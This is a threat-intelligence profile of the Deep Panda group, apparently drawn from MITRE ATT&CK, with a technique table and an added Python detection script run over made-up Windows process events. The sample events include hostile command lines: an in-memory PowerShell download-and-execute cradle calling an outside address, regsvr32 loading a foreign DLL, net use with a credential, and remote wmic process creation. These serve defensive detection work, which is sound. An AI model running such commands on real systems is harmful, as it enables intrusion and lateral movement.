Deep Panda is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications. The intrusion into healthcare company Anthem has been attributed to Deep Panda. The group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther. Deep Panda also appears to be the same group tracked as Black Vine, since both names have been attributed to the Anthem intrusion. Some analysts track Deep Panda and APT19 as the same group, but it is unclear from open source information whether they are.
| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1015 | Accessibility Features | Deep Panda has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions. |
| Enterprise | T1066 | Indicator Removal from Tools | Deep Panda has updated and modified its malware, resulting in different hash values that evade detection. |
| Enterprise | T1086 | PowerShell | Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk. |
| Enterprise | T1057 | Process Discovery | Deep Panda uses the Microsoft Tasklist utility to list processes running on systems. |
| Enterprise | T1117 | Regsvr32 | Deep Panda has used regsvr32.exe to execute a server variant of Derusbi in victim networks. |
| Enterprise | T1018 | Remote System Discovery | Deep Panda has used ping to identify other machines of interest. |
| Enterprise | T1064 | Scripting | Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk. |
| Enterprise | T1100 | Web Shell | Deep Panda uses Web shells on publicly accessible Web servers to access victim networks. |
| Enterprise | T1077 | Windows Admin Shares | Deep Panda uses net.exe to connect to network shares using |
| Enterprise | T1047 | Windows Management Instrumentation | The Deep Panda group is known to utilize WMI for lateral movement. |
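The host-side techniques in the table (sticky keys under winlogon.exe, in-memory PowerShell download-and-execute, regsvr32 loading a DLL from outside the Windows directory, tasklist, net use against admin shares, remote WMI process creation, and ping sweeps) all leave process-creation telemetry. The following is an added example, not MITRE's code or anything attributed to the group: a small detection pass over constructed Sysmon Event ID 1 / Security 4688 style events. Every event, host name, path and address below is made up for the demo. T1064 (Scripting) is covered by the same PowerShell rule as T1086; T1066 (rehashed malware) and T1100 (web shells) need file-hash and web-server data rather than process events, so they are deliberately not modelled here.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (constructed; fields mirror Sysmon EID 1)."""
    host: str
    image: str      # full path of the created process
    cmdline: str    # its command line
    parent: str     # full path of the parent process


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def tokens(cmdline: str) -> list:
    return cmdline.lower().split()


# --- per-event rules, one per technique in the table -------------------------

def sticky_keys(e: ProcEvent) -> bool:
    # sethc.exe swapped or IFEO-debugged: a shell/Task Manager spawned directly
    # by winlogon.exe at the logon screen, before any user has authenticated
    return (basename(e.parent) == "winlogon.exe"
            and basename(e.image) in {"cmd.exe", "powershell.exe", "taskmgr.exe"})


def powershell_in_memory(e: ProcEvent) -> bool:
    # download cradle or encoded command, typical of run-from-memory loaders
    return (basename(e.image) == "powershell.exe"
            and re.search(r"downloadstring|downloaddata|invoke-expression|\biex\b|-enc",
                          e.cmdline, re.I) is not None)


def regsvr32_foreign_dll(e: ProcEvent) -> bool:
    # regsvr32 registering a DLL that does not live under \Windows\ (rough, assumed heuristic)
    return (basename(e.image) == "regsvr32.exe"
            and ".dll" in e.cmdline.lower()
            and "\\windows\\" not in e.cmdline.lower())


def tasklist(e: ProcEvent) -> bool:
    return basename(e.image) == "tasklist.exe"


def net_use_unc(e: ProcEvent) -> bool:
    t = tokens(e.cmdline)
    return (basename(e.image) == "net.exe"
            and len(t) >= 3 and t[1] == "use" and t[2].startswith("\\\\"))


def wmic_remote_create(e: ProcEvent) -> bool:
    t = tokens(e.cmdline)
    return (basename(e.image) == "wmic.exe"
            and any(tok.startswith("/node:") for tok in t) and "create" in t)


RULES = [
    ("T1015", "Accessibility Features", sticky_keys),
    ("T1086", "PowerShell", powershell_in_memory),
    ("T1117", "Regsvr32", regsvr32_foreign_dll),
    ("T1057", "Process Discovery", tasklist),
    ("T1077", "Windows Admin Shares", net_use_unc),
    ("T1047", "Windows Management Instrumentation", wmic_remote_create),
]


def detect(events) -> list:
    """Return (host, technique id, name, cmdline) for every rule that fires."""
    return [(e.host, tid, name, e.cmdline)
            for e in events for tid, name, pred in RULES if pred(e)]


def ping_sweeps(events, threshold: int = 5) -> dict:
    """T1018: a host pinging many distinct targets in the window (threshold is assumed)."""
    targets = defaultdict(set)
    for e in events:
        if basename(e.image) == "ping.exe":
            args = [t for t in tokens(e.cmdline)[1:] if not t.startswith("-")]
            if args:
                targets[e.host].add(args[-1])
    return {h: sorted(t) for h, t in targets.items() if len(t) >= threshold}


# --- constructed sample telemetry (not real data) ----------------------------
SYS32 = r"C:\Windows\System32"
SAMPLE = [
    ProcEvent("ws01", SYS32 + r"\cmd.exe", "cmd.exe", SYS32 + r"\winlogon.exe"),
    ProcEvent("ws01", SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoP -W Hidden -c IEX (New-Object Net.WebClient)"
              ".DownloadString('http://203.0.113.5/a')", SYS32 + r"\cmd.exe"),
    ProcEvent("ws01", SYS32 + r"\regsvr32.exe", r"regsvr32.exe /s C:\ProgramData\msupd.dll",
              SYS32 + r"\cmd.exe"),
    ProcEvent("ws01", SYS32 + r"\tasklist.exe", "tasklist /v", SYS32 + r"\cmd.exe"),
    ProcEvent("ws01", SYS32 + r"\net.exe", r"net use \\fs01\C$ /user:corp\svc_backup P@ss",
              SYS32 + r"\cmd.exe"),
    ProcEvent("ws01", SYS32 + r"\wbem\WMIC.exe",
              'wmic /node:fs01 process call create "cmd.exe /c whoami"', SYS32 + r"\cmd.exe"),
    # benign noise: an admin re-registering a Windows DLL, and an ordinary shell
    ProcEvent("ws02", SYS32 + r"\regsvr32.exe", r"regsvr32.exe /s C:\Windows\System32\shell32.dll",
              r"C:\Windows\explorer.exe"),
    ProcEvent("ws02", SYS32 + r"\cmd.exe", "cmd.exe", r"C:\Windows\explorer.exe"),
] + [ProcEvent("ws01", SYS32 + r"\PING.EXE", f"ping -n 1 10.0.0.{i}", SYS32 + r"\cmd.exe")
     for i in range(1, 9)]

if __name__ == "__main__":
    for hit in detect(SAMPLE):
        print(hit)
    print("ping sweeps:", ping_sweeps(SAMPLE))
```

The rules are intentionally coarse: in a real SIEM the regsvr32 and PowerShell matches would be tuned against known-good software and the ping threshold against the environment's normal monitoring traffic, but the structure (one predicate per technique over a shared event schema, plus an aggregate rule for discovery sweeps) is what an analyst would hang a Deep Panda hunt on.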
- Alperovitch, D. (2014, July 7). Deep in Thought: Chinese Targeting of National Security Think Tanks. Retrieved November 12, 2014.
- ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.
- RSA Incident Response. (2014, January). RSA Incident Response Emerging Threat Profile: Shell Crew. Retrieved January 14, 2016.
- DiMaggio, J. (2015, August 6). The Black Vine cyberespionage group. Retrieved January 26, 2016.
- Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018.
- RYANJ. (2014, February 20). Mo’ Shells Mo’ Problems – Deep Panda Web Shells. Retrieved September 16, 2015.